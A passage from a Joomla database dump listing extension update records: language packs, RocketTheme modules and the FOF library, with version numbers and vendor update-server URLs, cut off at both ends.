LU','','pkg_de-LU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1600,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1601,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1602,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(1603,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(1604,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(1605,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1606,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1607,57,0,'French','','pkg_fr-FR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1608,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1609,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1610,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1611,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1612,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1613,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1614,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1615,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1616,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1617,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1618,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1619,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(1620,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1621,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1622,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1623,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1624,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1625,57,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1626,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1627,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1628,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1629,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1630,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1631,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1632,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1633,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1634,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1635,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1636,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1637,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1638,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1639,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1640,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1641,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1642,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1643,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1644,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1645,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1646,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3046',''),(1648,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1649,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1650,3,0,'French','','pkg_fr-FR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1651,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1652,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1653,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1654,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1655,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1656,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1657,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1658,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1659,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1660,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1661,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1662,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(1663,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1664,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1665,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1666,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1667,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1668,3,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1669,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1670,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1671,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1672,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1673,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1674,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1675,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1676,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1677,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1678,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1679,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1680,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1681,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1682,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1683,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1684,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1685,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1686,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1687,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1688,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1689,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(1690,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(1691,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(1692,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1693,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1694,57,0,'French','','pkg_fr-FR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1695,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1696,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1697,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1698,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1699,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1700,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1701,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1702,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1703,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1704,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1705,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1706,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(1707,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1708,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1709,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1710,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1711,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1712,57,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1713,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1714,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1715,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1716,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1717,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1718,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1719,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1720,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1721,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1722,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1723,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1724,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1725,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1726,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1727,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1728,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1729,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1730,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1731,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1732,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1733,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3046',''),(1735,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1736,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1737,3,0,'French','','pkg_fr-FR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1738,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1739,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1740,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1741,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1742,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1743,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1744,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1745,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1746,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1747,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1748,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1749,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(1750,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1751,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1752,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1753,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1754,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1755,3,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1756,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1757,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1758,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1759,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1760,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1761,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1762,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1763,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1764,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1765,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1766,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1767,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1768,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(1769,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1770,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1771,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1772,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1773,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(1774,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(1775,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(1776,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(1777,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(1778,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(1779,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(1780,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(1781,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(1782,57,0,'French','','pkg_fr-FR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(1783,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(1784,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(1785,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(1786,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(1787,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(1788,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(1789,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(1790,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(1791,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(1792,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(1793,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(1794,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(1795,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(1796,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(1797,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(1798,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(1799,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(1800,57,0,'English US','','pkg_en-US','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(1801,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(1802,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(1803,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(1804,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(1805,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(1806,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(1807,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(1808,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(1809,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(1810,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(1811,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(1812,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(1813,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(1814,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(1815,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(1816,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(1817,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(1818,57,0,'German 